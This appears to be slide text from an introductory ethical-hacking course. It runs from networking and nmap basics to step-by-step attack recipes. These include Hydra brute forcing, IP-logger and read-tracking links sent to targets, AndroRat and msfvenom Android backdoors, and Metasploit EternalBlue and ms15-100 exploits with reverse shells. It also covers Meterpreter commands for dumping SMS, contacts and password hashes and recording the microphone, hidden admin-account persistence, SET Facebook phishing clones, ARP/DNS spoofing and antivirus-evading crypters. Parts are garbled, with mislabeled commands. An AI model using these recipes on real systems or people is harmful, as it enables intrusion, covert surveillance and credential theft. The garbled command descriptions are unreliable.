Cyber Security

Cybersecurity is the body of technologies,

processes and practices designed to protect
networks, computers, programs and data from
attack, damage or unauthorized access.

Elements of Cyber Security

End-user
Compliance

Platform
Disaster and
Recovery Application
Elements Security
of Cyber
Security

Network Information
Security Security
 Elements of Cyber Security
End-user Compliance: Creating a security awareness training
program.
Information Security: Protected against the unauthorized use of
information
Platform and Application Security: Find information on
software vulnerability and threat management, application
attacks, software security tools, application firewalls, software
patching and more.
Network Security: Network security consists of the policies and
practices adopted to prevent and monitor unauthorized access,
misuse, modification or denial of a computer network and
network-accessible resources.
Disaster Recovery: Documented process or set of procedures
to recover and protect a business IT infrastructure in the event of
a disaster.
 What is Hacking?
Identifying weakness in computer systems Software or
Networks to exploit its weaknesses to gain access.
Who is Hacker?
A Hacker is a person who finds and exploits the weakness in computer
systems and/or networks to gain access. Hackers are usually skilled computer
programmers with knowledge of computer security.

Types of Hackers
White Hat: Identify the weakness in the System/Network for the organization
Black Hat: Identify the Weakness in the System/Network to steal data and
demand the money.
Gray Hat: Identify the weakness in the System/Network for the offence and
defence.
Script Kiddies: Use only Tools without any conceptual knowledge.
 Phases of Hacking
Target Scoping
Reconnaissance Passive Information
Scanning Active Information
Vulnerability Analysis
Building Exploit
Attack and Gain Access
Maintaining Access
Clearing Tracks or Reporting
 Hacking Terminology

Vulnerability
Bug or Weakness in the Software
Exploit
Make use of (a situation) in a way considered unfair or
underhand.
Payload
A payload refers to the component of a computer virus
that executes a malicious activity
 Hacking Terminology

Zero-day Attack / Exploit

Vulnerability refers to a bug in software that is unknown to the
vendor or until to fix the bug.
Hack Value
Reason or Motivation behind the Hacking.
Target of Evolution
Software Components / Collection of Products assembled to
meet the Hacking Target.
 Basic Precautions taking by Hackers

Tor
Browser
VPN /
Proxies
https://www.mailinator.com https://www.guerrillamail.com

http://mailexpire.com http://www.fakeinbox.com
 Foot Printing
Reconnaissance
Organization Individual
Website Details Email Details

Sub URL Details Working Details

Who is Details and Contact Details Social Networking Details

DNS and Name Servers Information Any other Contacts Information if Possible

Server IP Addresses Information Location Details

Public Profiles Information

Internet Service Provider Details
 Foot Printing
Reconnaissance
Collect Domain Information and also Identify any Valuable information like
Location, Contact Details, Social Networking Details etc Information from
the Search Engines and Domain URL
 Foot Printing
Reconnaissance
Collect the Domain Ownership Details from whois.com
 Foot Printing
Reconnaissance
Collect the Mailids Information of the Required Domain
 Foot Printing
Reconnaissance
Collect the Mailids and Sub domains Information
#theharvester -d wipro.com l 100 b all
 Foot Printing
Reconnaissance
Google Hacking
Expression Description Example

Intitle Search Page Title intitle: Next Generation Telecom Training

intitle: index of /mp3
inurl Search URL inurl: login.php
filetype Specific Files filetype: doc
filetype: xls username password
intext Search Text of Page Only intext: HUDA Swarnajayanthi Complex
site Search Specific Site site: convergence-labs.com
site: in
link Search for Links to Pages
inurl: edu.* filetype:xls @gmail.com
Inurl: gov.* filetype: xls password
Unprotected cameras
 Basics of Networking
Internet is a combination of MSPs, Undersea Backbone Operators and
ISPs

Internet Backbone
MSPs
ISPs
Basics of Networking
 Basics of Networking
STM 4
NW P.NO
DATA 1 0 0 202 1
CENTER 198.142.36.16 NW P.No
198 0
1 202 3
198 2
0 1
NW P.No
3 0 IAB
202 2 2
1
198 0 3
2

DNS

n or I n bI
NW P.No c
e g f z
1 3 o o
202 3 m t
0 2
198 1 2
0
3 1
NW P.No
B M
A W N D 202 2
I A
A W A N 198 3
L I
A W T S
L L

10.1.1.1

N W P. No
10.1.1.2
S 202 0
W R 1 IP Packet
10.1.1.3 I A F 0 1 0 198 1
T S - T P - C D
C S W I - T R - R DATA I
10.1.1.4 H
202.11.65.24 P - L O - C P
10.1.1.1
202.11.65.10
10.1.1.1 198.142.36.42
 The OSI Model
Open Systems Interconnection

7 Application FTP, HTTP, Telnet

6 Presentation JPEG, MPEG, PDF

5 Session BIOS, NetBIOS, NetBEUI

4 Transport TCP, UDP, SCTP

3 Network IP, OSPF, RIP, BGP - 4

2 Datalink ATM, FR, Ethernet

1 Physical RS-232, RJ-45, V.35

 The TCP/IP Model
7 7 Application
Application

6 6 Presentation
Presentation Application

5 5 Session
Session

4 4 Transport
Transport TCP

3 3 Network
Network IP

2 2 Datalink
Datalink
Host - to - Network
1 1 Physical
Physical
 IP Addresses Classification
Class Starting Ending

Class A 1.0.0.0 126.255.255.255

Class B 128.0.0.0 191.255.255.255

Class C 192.0.0.0 223.255.255.255

Class D 224.0.0.0 239.255.255.255

Class E 240.0.0.0 255.255.255.255

127.0.0.0 127.255.255.255 Loop Back Adapter

 Private IP Addresses

Class A 10.0.0.0 10.255.255.255

Class B 172.16.0.0 172.31.255.255

Class C 192.168.0.0 192.168.255.255

 Internet Architecture
Network of Networks
Private IPs Private IPs

Data Center with Public

Private IPs Private IPs
IPs
 What are Ports?
Ports are conceptual points of entry into a host
computer.




13 Port Number
13
Selects the process

192 . 14 . 26 . 7

IP Header

192 . 14 . 26 . 7
IP Address
UDP Header 13 Selects the host
 ICANN ranges

Registered

0 1,023 49,152 65,535

1,024 49,151

Well Known Dynamic or Private

Internet Corporation for Assigned Names and Numbers

 Well-known ports
Port Protocol
20 FTP Data
21 FTP Control
22 SSH
23 Telnet
25 SMTP
53 Name Server
80 HTTP
110 POP3
143 IMAP
443 HTTPS
546 DHCP Client
547 DHCP Server
 Basic Networking Commands
Windows
C:\> ipconfig - Display IP Address Information

C:\> ping - Test the reachability to the given Host

C:\> tracert - Distance Between the Networks (Hop Count)

C:\> netstat - Running Ports Information

Linux
bash# ifconfig - Display IP Address Information

bash# ping - Test the reachability to the given Host

bash# traceroute - Distance Between the Networks (Hop Count)

bash# netstat - Running Ports Information

 Foot Printing
Scanning
Objectives of Scanning
Network Scanning
Port Scanning
Vulnerability Research
Tools for Network Scanning
1. nmap (https://nmap.org)
2. Zenmap (Official Nmap Security Scanner GUI)
3. Angry IP Scanner
4. netdiscover (#netdiscover r 192.168.0.1/24)
5. arping (MAC Address Scanning)
 TCP Communication Flags
Syn (Synchronize) : The SYN flag is initially sent when establishing the handshake
between two hosts for initiate the Connection.

URG (Urgent): This flag is used to identify incoming data as 'urgent'. Such incoming
segments do not have to wait until the previous segments are consumed by the
receiving end but are sent directly and processed immediately.

Ack (Acknowledgement) : The Acknowledgement flag is used to acknowledge the

successful receipt of packets.

PSH (Push): The Push flag, like the Urgent flag, exists to ensure that the data is given
the priority (that it deserves) and is processed at the sending or receiving end.

FIN (Finish): There will be no more Transmission

RST (Reset): This indicates that the remote host has reset the connection.
 Stealth Mode
This scan is also known as half open scan. Because nmap will confirm ports are open
on destination side, when destination ports is making two way handshake with attacker
or nmap.

Syn

Sys / Ack
Port is Open

Syn

Rst

Port is Closed
Firewall does not raise alarm if it is two way handshake. If the 3 way handshake cases if
the IP is from outside firewall raises the alarm.
#nmap sS 192.168.0.146
Note: it only scans 1000 Important ports.
Closed: Target Software is Not Running
Open: Service is running and allowing connections
Filtered: Service is running behind the Firewall.
 TCP Connect Scan
Syn
Sys / Ack
Ack
Port is Open

Syn
Rst

Port is Closed

This scan is also known as Full Open Scan because nmap confirms ports are open
when nmap is able to make 3 Way handshake with Destination Computer Ports.

#nmap sT 192.168.0.150
 Other Scan Options
Software Version Scan
#nmap sV 192.168.0.146
It check for the software versions running in the Server/Target.

OS Detection / FIN Scan

#nmap O 192.168.0.146 / #nmap sF 192.168.0.146
This can is used to identify weather target system is Linux or Windows

FIN

Port is Open and Target is Linux

FIN
Rst
Port is Closed and Target is Windows

Note: Honeypots are creating a feeling that target has a different Operating System
 Other Scan Options
XMAS Scan
#nmap sX 192.168.0.146
It check for the OS running in the Server/Target.

FIN / PSH / URG

Port is Open and Target is Linux

FIN / PSH / URG

RST
Port is Closed and Target is Windows
 Foot Printing Counter Measures

1. Configure Webservers to avoid Information Leakage

2. Educate Employees to use nicknames on blogs, groups and forums

3. Do not reveal Critical Information like Annual Reports in Press Releases

4. Limit the amount of Information that we are publishing on the Website

5. Use Foot Printing Techniques to discover and remove any sensitive

information publicly available

6. Always Prefer Private Registration for Domain Registrations

7. Disable Directory Listings in the Web Server

 Social Engineering Techniques
Kali Linux Tools for Generate Usernames and
Passwords
Usernames: cupp (Common user Password Profiler)
Note: We need to Install this tool in kali linux using below command
#apt-get install cupp
Generate usernames
#cupp i

Passwords: crunch
Generate Passwords
#crunch 5 8 someguess o destinationname.txt

Attack using Hydra Tool

#hydra L usernamefile.txt P passwordfile.txt URL o filename to store the
match result
 Social Engineering Techniques
Identify the User IP Location
Step 1: Select any Attarctive Video/ Image URL from the Internet.

Step 2: Open the http://www.grabify.link Website.

Paste the Link in the Website and Collect the Short URL from Website.

Send the Link to Target using Email or any other Social Networking Services.

Refresh the Website for Updates and you will get the IP Details of the Target if
the Target Click on the Link
 Social Engineering Techniques
Get Read Notification of Mail
Step 1: Open http://readnotify.com Website and Register the Mail ID

Step 2: Login into Your Mail, Compose mail and Select the TargetMail Id
and add .readnotify.com at end of the Traget Mail Id and Send the Mail.
Ex: clabs@gmail.com.readnotify.com

Step 3: Login into readnotify.com using your Detail to see

Acknowledgement details in case of target read your mail.
 Malware Threats
Malware is a Malicious Software that damages or disables computer systems and
gives Limited / Full Control of the Systems to the malware creator for the purpose
of Theft or Fraud
Trojens / Rats: It is a malicious computer program which is used to hack into a computer by
misleading users of its true intent.

Virus: A piece of code which is capable of copying itself and corrupting the system or
destroying data.

Worms: It is a standalone malware computer program that replicates itself in order to spread to
other computers.

Root Kits: It is designed to hide the fact that an operating system has been compromised.

Spywares: It aims to gather information about a person or organization without their

knowledge.

Ransom Wares: Ransomware is a type of malicious software that blocks access to the victim's
data.

Adwares: Software that automatically displays or downloads advertising material such as

banners or pop-ups when a user is online

Crypters: Crypters are software tools that use a combination of encryption, obfuscation, and
code manipulation
 Trojen / Rat
Trojan / RAT (Remote Administration Tool), is a malicious
computer program which is used to hack into a computer by
misleading users of its true intent.
1. Darkcomnet Rat
2. Pro Rat
3. Sub 7
4. Poison ID Rat
5. Zues Rat
6. Cyber Gate Rat
7. Cerve Virus Rat
8. Turkogan Rat
9. Spy Eye
10. NJ Rat
11. Stuxnet
 Social Engineering Techniques
Hack Windows System using Social Engineering and
Darkcomet Rat Tool
 Social Engineering Techniques
Hack Android Mobile using Social
Engineering and Andro Rat Tool
1. Dowload Andro Rat Software and Run Andro Rat Binder
2. Upload any Apk File to Attach the RAT along with APK using Build+Bind Option
Or
Use only Bind Option to Attach the RAT File with an Inbuilt APK File
3. Press go to Generate the APK File.
4. Use Social Engineering to Make Install of APK file in Target Mobile and Run.
5. Run androrat tool present in the Androrat Directory to Capture the Information from
the Android Mobile.
 Network Models in Social Engineering
Attacker and Target are in the Same Network
 Network Models in Social Engineering
Attacker and Target are in Public Networks
 Network Models in Social Engineering
Attacker and Target are in Different Private Networks
or Only Attacker in Private Network
 Network Models in Social Engineering
Attacker and Target are in Different Private Networks
or Only Attacker in Private Network
Step 1: Port Forwarding (This only if the Router has Public IP Address)

Step 2: Create a Temporary Sub Domain from noip.com

 Information Security Threats
Natural Threat
Physical Threat
Human Threats

Hackers

Social Engineering
Functionality
Lack of Knowledge and Awareness

Security Usability
 Prerequisites
1. Basics of Linux
2. Basics of Windows
3. Basics of Networking
4. Working with Virtual Box and Network Configurations
5. Working with Kali
6. Working with Tor Browser
7. Working with VPN and VPN Tools
8. Creating Fake Mail IDs for Temporary Purpose to Register in
Different Websites Ex: Mailinator.com
9. Get the Public IP Address -> grabify ip logger (grabify.link)
10. Get the Temparary Domain Name -> noip.com
 Vulnerability Research
The Process of discovering vulnerabilities and design Flaws. That will open an
operating system and its applications through attack or misuse.

Vulnerabilities are classified based on security level, severity level like low,
medium or high and exploit range local or remote.

1. CVE: Common Vulnerability Entry

2. CVSS: Common Vulnerability Security Score
3. OSVDB: Open Source Vulnerability Data Base

Microsoft Vulnerability Code

Ms17-001
Year of Identify-Sno

Some Websites
1. Securityfocus.com
2. packetstormsecurity.com
3. us-cert.gov (Computer Emergency Response Team)
4. www.exploit-db.com
5. www.thehackernews.com
 System Hacking with Meta Sploit
Exploit: It is a piece of malicious program code which takes help of
vulnerability to compromise the target computer and executes the payload for
controlling remote computers.

Types of Exploits:
1. Public Exploits
2. Private Exploits (Zero Day Exploit)

Types of Public and Private Exploits

1. Remote Exploits
2. Local or Privilege Escalation Exploits

Types of Remote and Local Exploits

1. Server side Exploit -> Having Information about the target
2. Client side Exploit -> Use Social Engineering (send mail/files)
 Hacking with Meta Sploit
Metasploit: Metasploit is a self describe frame work for
cyber exploitation. As a framework it eases to effort the
exploit known vulnerabilities in networks, os and
application and to develop new exploits for new or
unknown vulnerabilities.

Desktop Software's included in metasploit framework

1. msfconsole

2. msfvenom

3. armitage
 Hacking with Meta Sploit
List of Modules available in msfconsole (6 Modules)
1. Exploits
2. Auxilary (Network Scanners, Port Scanners, Enumeration Tools, Dos Attack
Tools)
3. Payload
4. Post (Pattern Lock Remove, rooted phone whatsapp data)
5. Encoders (Without Recognize Payload) (Crypters Softwares using the
Payload)
6. Nop (No Operation Buffer Overflow Attacks)

List of Modules available in msfvenom (It is a Backdoor generator to

Create Files)
1. Payload
2. Encoders
3. Nop
 Method to Hack Windows 7 and 8 with
ms17-010 (eternal blue) exploit (Server)

1. Search 445 port is open in the Target System/Network using nmap

#nmap O <target ip address>
2. msf> search ms17-010
3. copy the selected exploit according to your requirement
4. msf>use <paste the selected exploit>
5. smf> show options (To know the Inputs required)
6. smf> set payload windows/shell/reverse_tcp
7. smf> set RHOST <Target IP Address>
8. smf> set LHOST <attacker IP Address>
9. smf>set LPORT 1212
 Method to Hack Windows 7 and 8 with
ms17-010 (eternal blue) exploit (Server)
10. smf>exploit
Note: if any error unset the payload
11. smf>unset payload
12. smf>set payload windows/meterpreter/reverse_tcp

How to Maintain the Session in Windows Machine

1. c:\> net user <username> <password> /add

2. c:\> net localgroup administrators <username> /add

3. c:\> reg add

"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
 Method to Hack Windows 7 and Windows
Server 2008 r2 with ms15-100 Exploit (Client)
1. msf> search ms15-100
2. copy the selected exploit according to your requirement
3. msf>use <paste the selected exploit>
4. msf> show options (To know the Inputs required)
5. msf> set SRVHOST 192.168.0.195
6. msf> set payload windows/shell/reverse_tcp
7. msf> show options
8. msf> set LHOST 192.168.0.195
9. msf>set LPORT 1212
10. smf>exploit
11. Copy the File into Apache Webserver or Send the Link for access the Infected File
12. msf> sessions l
13. msf> sessions i <session id>
 Method to Hack Android Phone using
msfvenom & msfconsole
1. Excute the msfvenom tool along with the Below Option to Create the APK
file.
#msfvenom p android/meterpreter/reverse_tcp LHOST=192.168.10.102
LPORT=5131 > /var/www/html

2. Run the msfconsole Tool

3. msf> use exploit/multi/handler

4. msf> set payload android/meterpreter/reverse_tcp

5. msf> set LHOST 192.168.10.102

6. msf> set LPORT 5131

7. msf> exploit
 List of Android Meterpreter Commands
1. meterpreter> sysinfo -> System Information
2. meterpreter> hide_app_info -> Hide App Icon
3. meterpreter> check_root -> Phone is Rooted or not
4. meterpreter> dump_calllog -> All Logs will be Saved
5. meterpreter> dump_contacts -> All Contacts will be Stored
6. meterpreter> dump_sms -> Display all the Key Logger Recorded Data
7. meterpreter> record_mic d 15 -> Record the Voice
8. meterpreter> webcam_list -> Cameras List
9. meterpreter> webcam_snap /Webcam_snap i 2 ->Take the Screenshot
10.meterpreter> shell -> Display the List of Web Cams
11.shell> download <src> <destination> -> Download File from Phone
12. shell> upload <src> <destination> -> Upload File to Phone
 List of Meterpreter Commands
14. meterpreter> cd <path> -> Change the Directories
15.meterpreter> upload source dest -> Upload the File
1. Note: We can add attrib +h +s +r <filename> -> To hide the File
16.meterpreter> shell
17.meterpreter> download source dest -> Download the file
18.meterpreter> clearev
19. meterpreter> get privs -> Get all the privileges
20. meterpreter> migrate <processid> -> Move to a given process id process to
get more privileges
21. meterpreter> hashdump -> Extract Windows Account Password
22. meterpreter> background -> Minimize the Interpreter
23. meterpreter> sessions -l -> View Sessions
24. meterpreter> search bypassuac -> This record the voice but max 15 Secs
 Phishing Attacks
Phishing: Phishing Emails are POPUPs Redirect the User to fake web pages for
cloning Trust worthy sites that ask them to submit their personal Information.
Site: z-shadow.co / shadowwave.com
Kali Linux Tools: Application -> Social Engineering Tools -> SET (Social
Engineering Tool Kit)
Set>1 Step 1: Social Engineering Attacks
Set>2 Step 2: Website Attack Vectors
Set>3 Step 3: Credential Harvester Attack Method
Set>2 Step 4: Cloner
Set>192.168.10.106 Step 5: Enter IP Address where to Capture Information
Set>http://www.facebook.com Step6: Select the Website to Create the Fake Website
--------------------------
Capture Data using Sniffers and Identify the Passwords if the User Entered Information
Filters: http.request.method=POST
 DNS Poisoning
It is a technique that tricks a DNS Server into believing that it has received authentic
Information when in reality it has not. It results in substitution of a false IP Address at
the DNS level where web addresses are converted into numeric IP Address. It allows
attacker to replace IP Address entries for a target site on a given DNS Server with IP
Address of the Server he/she controls.

Step1: create a file and write the Entries in the Following way
192.168.10.6 www*
192.168.10.6 login*
192.168.10.6 accounts*
192.168.10.6. http*

Step2: Save the File in the System

Step3: Port Forwarding

#echo 1> /proc/sys/net/ipv4/ip_forward

Step4: arpspoof t <routerip> <targetip>

Step5: arpspoof t <targetip> <routerip>

Step6: dnsspoof f /root/Desktop/hosts.txt host <targetip> and udp port 53

 Crypter
A Crypter is a software used to hideout viruses or any trozens from antiviruses. So that
they are not detected or deleted by antiviruses. Thus a Crypter is a program that allows
users to crypt the source code of their program.

Types of Cryptors:
1. Public
2. Demo Crypter
3. Private or Zero Day Crypter

Types of Public and Private Crypters

1. UD Crypters (Undetectable Crypters)
2. FUD Crypters (Fully Undetectable Crypters)

Types of UD and FUD Crypters

1. Runtime Crypters
2. Scantime Crypters

Hide Data Behind the Image

Step1: Create a Folder, copy the data and Create the ZIP.
Step2: Take any Image
Step3: run the command
cmd:\> copy /b file.jpg+topsecret.zip outputfilename.jpg

Note: We can identify this using winhex sofwtare

 Future Topics

1. More Malware Effects

2. More Advanced Exploit Attacks
3. Web Server Attacks
4. Man in the Middle Attacks
5. Denial Of Services (DOS) and Distributed Denial of Services (DDOS)
6. Session Hijacking
7. Cross Site Scripting (XSS)
8. SQL Injection
9. Web Application Security Testing
10. Wifi Hacking
11. Cryptography and Hash Functions
 Honeypots
Honeypots: Honeypot is an Information System resource, i.e expressely setup to
attract and trap people who attempt to penetrate an organizational network. A honeypot
can lock port access attempts or monitor an attackers key strokes. These could be early
warnings of a more concerted attack.
Types of Honeypots
1. Low Interaction Honeypots:
These honeypots simulates only a limited no of services and applications of a
target system or network. It used to collect dangerous attacks information.
Ex: KF Sensor, Honeyd, Honeybot, Spector

2. High Interaction Honeypots:

These honeypots simulates all services and applications. It can completely
compromised by attacks to get full access to the system in a controlled area.
Ex: Honeynets, Symantic, Decoy Server
 IDS Intrusion Detection System
An IDS Inspects all inbound and outbound network traffic for suspicious patters that may
indicate a network or a system security breach. The IDS checks traffic for known
signatures that match known intrusion patterns and it alarms when a match is found.

IPS Intrusion Prevention System

An IPS Inspects all inbound and outbound network traffic for suspicious patters that may
indicate a network or a system security breach. The IPS checks traffic for known
signatures that match known intrusion patterns and it alarms and prevents when a
match is found.

Types of IDS and IPS

Network Based IDS/IPS
Checkpoint, Juniper, Dell Snoicwall, Cyber Roam, Cisco IDS&IPS, Mcafee
Security Agent, Imperver
Host Based IDS/IPS
Kaspersky Internet Security, Avast Internet Security, Bit Defender Inetrnet
Security etc.